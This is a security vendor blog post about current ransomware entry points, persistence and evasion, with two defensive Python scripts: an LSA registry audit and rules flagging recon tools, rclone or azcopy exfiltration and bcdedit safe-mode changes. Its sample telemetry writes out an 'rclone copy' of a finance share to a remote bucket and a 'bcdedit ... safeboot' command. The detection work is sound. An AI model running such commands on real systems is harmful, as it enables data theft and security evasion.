
The Evolution of Ransomware Entry Points: Why the Perimeter Isn’t the Perimeter Anymore

Brad LaPorte

29 Dec 2025

In Morphisec’s recent CTO Briefing: The State of Ransomware, CTO Michael Gorelik dissected a critical reality that every CISO and security leader must confront: ransomware attacks aren’t succeeding because attackers are getting louder—they’re succeeding because they’re getting quieter. 

Modern ransomware campaigns blend stealth, social engineering, supply-chain exploitation, cloud misconfigurations, and sophisticated evasion techniques that bypass even the most advanced detection-based tools.   


The Evolution of Entry Points: Why the Perimeter Isn’t the Perimeter Anymore   

One of the strongest themes from the briefing was that initial access is no longer predictable.  

Attackers don’t rely on a single entry method—they exploit whatever misconfiguration, overlooked control, or human blind spot they can find.

Recent attack patterns show a dramatic rise in:   

  1. SonicWall Configuration Theft and Cloud Backup Exploits
     In the briefing, Michael detailed multiple real-world incidents where Akira ransomware actors abused SonicWall’s cloud backup feature (“MySonicWall”) to steal configuration files (EXP files) and reinfect environments—even after the victim believed they had contained the attack.
     This aligns with Morphisec’s broader findings that attackers increasingly abuse legitimate tools and management consoles, rather than brute-forcing entry.
  2. Unpatched FortiGate Appliances
     Keeling ransomware affiliates continue to exploit older Fortinet vulnerabilities—particularly those left unpatched in smaller IT environments or MSP-managed networks.
     Attackers know that network appliances and boundary devices lag behind endpoint updates.
  3. Social Engineering Through Microsoft Teams
     Michael highlighted a troubling trend: Teams-based pretexting where attackers impersonate internal IT staff to convince employees to install Quick Assist or remote-control tools.
     This technique bypasses email security entirely and takes advantage of environments that allow external Teams communication.
  4. Trusted Tools Turned Against You
     The kill chain is increasingly built on legitimate IT tools used in unintended ways:
     • Advanced IP Scanner
     • Nmap / ZenMap
     • PowerShell
     • RClone
     • Azure Copy
     • Backup software APIs

Attackers don’t break in—they walk in using the same tools your IT team relies on.

Persistence and Backdoors: Attackers Don’t Come Alone Anymore  

Another core insight from the webinar: modern ransomware isn’t a single sequence; it’s a mesh. Attackers establish multiple overlapping backdoors so that even if you close one entry point, another one stays live.   

Recent investigations have uncovered:   

  • ScreenConnect Persistence via Authentication Packages — Attackers hijack authentication packages to run ScreenConnect at the OS level, hidden beneath standard user activity. This makes it extremely difficult for EDR tools to flag malicious sessions.
  • Portable Node.js and Java Bundles — Attackers drop portable, self-contained Node.js or Java environments—including all dependencies—to create lightweight backdoors without requiring installation. They behave like legitimate software processes, making behavioral detection nearly impossible.
  • Shadow Infrastructure — Michael detailed scenarios where attackers build:
    • Hidden virtual machines
    • Isolated encryption environments
    • Side-channel data transfer paths
    … allowing them to evade all endpoint-based security.

This reinforces what Morphisec highlights in its What Is Anti-Ransomware? guide: attackers are no longer trying to “beat” your EDR—they’re operating outside its scope entirely.
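The authentication-package persistence described above leaves a footprint a defender can baseline: LSA loads the DLLs listed under the `Authentication Packages` value of `HKLM\SYSTEM\CurrentControlSet\Control\Lsa`, and a stock install lists only `msv1_0`. The script below is an added example (not Morphisec’s code or anything from the briefing) that parses `reg query` output for that key and flags any entry outside an expected baseline. The two host snippets are constructed sample input laid out the way `reg query` prints REG_MULTI_SZ data (entries separated by a literal `\0`); the baseline set and the path of the extra package are assumptions you would replace with your own golden image.

```python
"""Audit LSA authentication package registrations for unexpected DLLs.

Added example, not Morphisec's code. Sample input below is constructed to
mimic `reg query` output; the baseline is an assumption to adjust per image.
"""
import re
import subprocess
import sys

LSA_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa"

# Baseline: a stock Windows install registers only msv1_0 as an
# authentication package (assumption: adjust to your golden image).
BASELINE = {
    "Authentication Packages": {"msv1_0"},
}

# Constructed sample output for a clean host.
CLEAN_HOST = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Authentication Packages    REG_MULTI_SZ    msv1_0
    Security Packages    REG_MULTI_SZ    ""
"""

# Constructed sample output for a host with an extra, unexpected package
# (hypothetical path, not an indicator from the briefing).
SUSPECT_HOST = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Authentication Packages    REG_MULTI_SZ    msv1_0\0C:\ProgramData\auth\scauth
"""

# A reg query value line: indent, name, >=2 spaces, type, >=2 spaces, data.
VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")


def parse_reg_query(text):
    """Return {value name: [entries]} parsed from reg query output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue
        data = m.group("data").strip()
        if m.group("type") == "REG_MULTI_SZ":
            # reg query renders multi-string entries separated by a literal \0
            entries = [e for e in data.split(r"\0") if e and e != '""']
        else:
            entries = [data]
        values[m.group("name")] = entries
    return values


def audit_lsa_packages(values, baseline=BASELINE):
    """Return (value name, entry) pairs not present in the baseline."""
    findings = []
    for name, expected in baseline.items():
        allowed = {e.lower() for e in expected}
        for entry in values.get(name, []):
            if entry.lower() not in allowed:
                findings.append((name, entry))
    return findings


def query_live_lsa():
    """Read the real key on a Windows host; raises elsewhere."""
    if not sys.platform.startswith("win"):
        raise RuntimeError("live query requires Windows")
    result = subprocess.run(["reg", "query", LSA_KEY],
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    for label, text in (("clean", CLEAN_HOST), ("suspect", SUSPECT_HOST)):
        print(label, audit_lsa_packages(parse_reg_query(text)))
```

Any finding is worth a manual look: a legitimate third-party package is possible, but a DLL path under a user-writable or ProgramData location is exactly the kind of entry the briefing describes. Run `query_live_lsa()` in place of the constructed strings to check a real host.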

Defense Evasion: The Quiet Engine of Ransomware Success

The briefing emphasized that ransomware succeeds because attackers can evade, not because encryption tools are sophisticated. Modern evasion tactics make ransomware payloads the least interesting part of the attack.

Key trends include:  

  1. Safe Mode Encryption — Many EDR tools—including leading solutions—are partially or completely inactive in safe mode. Attackers simply reboot a host into safe mode and run encryption unchallenged.
  2. Telemetry Suppression — Attackers tamper with:
     • ETW (Event Tracing for Windows)
     • Kernel callbacks
     • Security agent notification channels
     • Behavioral monitoring hooks
     Without telemetry, detection tools see nothing.
  3. BYOVD (Bring Your Own Vulnerable Driver) — Even with Microsoft expanding blocklists, attackers continue to abuse signed but vulnerable drivers to gain kernel-level access and tamper with security controls.
  4. Golang and Rust-Based Encryptors — High-level languages used for custom encryptors:
     • evade signature-based detection
     • operate without traditional hooking
     • compile into lightweight, static binaries
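Two of the patterns on this page leave command-line evidence before any encryption starts: the “trusted tools” list in the entry-points section (Advanced IP Scanner, Nmap, RClone, Azure Copy) and the safe-mode reboot described in item 1 above, which requires changing the boot configuration first. The block below is an added example, not Morphisec’s code, showing how simple detection logic over process-creation telemetry can tie those stages together per host. The events are constructed Sysmon-style records, and the rule names, regexes and the two-rule escalation threshold are assumptions, not a published ruleset.

```python
"""Flag living-off-the-land tooling and safe-mode preparation per host.

Added example, not Morphisec's code. Events are constructed, Sysmon-style
process-creation records; rules and thresholds are assumptions.
"""
import re
from collections import defaultdict

# Constructed sample events (not real telemetry).
EVENTS = [
    {"host": "ws01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir", "parent": "explorer.exe"},
    {"host": "ws01", "user": "CORP\\jdoe",
     "image": r"C:\Users\jdoe\Downloads\advanced_ip_scanner.exe",
     "cmdline": "advanced_ip_scanner.exe /r:10.0.0.0/24", "parent": "explorer.exe"},
    {"host": "fs02", "user": "CORP\\svc_backup", "image": r"C:\Temp\rclone.exe",
     "cmdline": "rclone.exe copy D:\\Shares\\Finance remote:bucket --transfers 32",
     "parent": "cmd.exe"},
    {"host": "fs02", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": "bcdedit /set {default} safeboot network", "parent": "powershell.exe"},
    {"host": "ws05", "user": "CORP\\helpdesk",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Service", "parent": "explorer.exe"},
]

# (rule name, pattern, event field the pattern is applied to). PowerShell by
# itself is deliberately not a rule: on its own it is too noisy to act on.
RULES = [
    ("recon_scanner", re.compile(r"(advanced_ip_scanner|nmap|zenmap)\.exe$", re.I), "image"),
    ("exfil_tool_remote", re.compile(r"\b(rclone|azcopy)(\.exe)?\b.*\b(copy|sync)\b", re.I), "cmdline"),
    ("safeboot_set", re.compile(r"bcdedit\b.*\bsafeboot\b", re.I), "cmdline"),
]


def match_rules(event):
    """Return the names of all rules an event satisfies, in rule order."""
    return [name for name, pattern, field in RULES if pattern.search(event[field])]


def detect(events):
    """Return one finding per (event, rule) hit."""
    findings = []
    for event in events:
        for rule in match_rules(event):
            findings.append({"host": event["host"], "user": event["user"],
                             "rule": rule, "cmdline": event["cmdline"]})
    return findings


def escalate(findings, min_rules=2):
    """Hosts where at least min_rules distinct stages fired: staging plus
    evasion prep on one machine is a stronger signal than either alone."""
    rules_by_host = defaultdict(set)
    for f in findings:
        rules_by_host[f["host"]].add(f["rule"])
    return sorted(h for h, rules in rules_by_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    hits = detect(EVENTS)
    for f in hits:
        print(f"{f['host']:<5} {f['rule']:<18} {f['cmdline']}")
    print("escalate:", escalate(hits))
```

In the sample, `ws01` gets a single scanner hit that an analyst can triage at leisure, while `fs02` pairs a bulk `rclone copy` with a `bcdedit ... safeboot` change and is escalated; a real deployment would add a time window to `escalate` and read events from the SIEM instead of the inline list.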

This last trend reinforces Michael’s statement in the briefing: “There is no ransomware event without evasion. Evasion is the backbone of every modern attack.”   

Why Detection Alone Isn’t Enough   

The briefing’s most important strategic message was that detection-based security can’t keep up. Even organizations with best-in-class EDR and MDR tools continue to experience ransomware breaches.   

This reinforces a core Morphisec principle seen across multiple articles:   

  • Ransomware is too fast for detection 
  • The kill chain is too dynamic to identify in real time 
  • The focus must shift to preemptive prevention  

Stopping ransomware requires preventing the attack chain—not waiting to detect malicious activity mid-execution.

What CISOs Can Do Now: Practical Takeaways from the Briefing   

  1. Reduce your EDR blind spots.
     Non-agent assets—appliances, NAS devices, QNAPs, gateways—are prime targets.
  2. Harden remote collaboration tools.
     Disable external Teams calls by default. Monitor remote admin tool usage.
  3. Treat ransomware as a business problem.
     Attackers choose victims based on business impact and payout potential.
  4. Prioritize preemptive protection.
     Deception technology and moving target defense stop attackers before they can execute or persist—closing the gaps where detection fails.
  5. Validate all backup assumptions.
     Backups are one of the most commonly exploited weaknesses. Test recovery quarterly.

A New Era of Ransomware Requires a New Era of Defense 

The ransomware kill chain of 2025 is quieter, more adaptive, and more evasive than anything seen in previous years. Attackers don’t break in—they infiltrate through misconfigurations, trusted tools, and human gaps. They don’t just encrypt—they blind your tools first. And they don’t rely on malware—they rely on your environment.

Learn how attackers are bypassing controls—and how preemptive defense stops them. For a full breakdown of the kill chain, including real incident deep dives and predictions for 2026, watch the complete CTO briefing. 


About the author

Brad LaPorte

Chief Marketing Officer

Brad LaPorte is a seasoned cybersecurity expert and former military officer specializing in cybersecurity and military intelligence for the United States military and allied forces. With a distinguished career at Gartner as a top-rated research analyst, Brad was instrumental in establishing key industry categories such as Attack Surface Management (ASM), Extended Detection & Response (XDR), Digital Risk Protection (DRP), and the foundational elements of Continuous Threat Exposure Management (CTEM). His forward-thinking approach led to the inception of Secureworks’ MDR service and the EDR product Red Cloak—industry firsts. At IBM, he spearheaded the creation of the Endpoint Security Portfolio, as well as MDR, Vulnerability Management, Threat Intelligence, and Managed SIEM offerings, further solidifying his reputation as a visionary in cybersecurity solutions years ahead of their time.
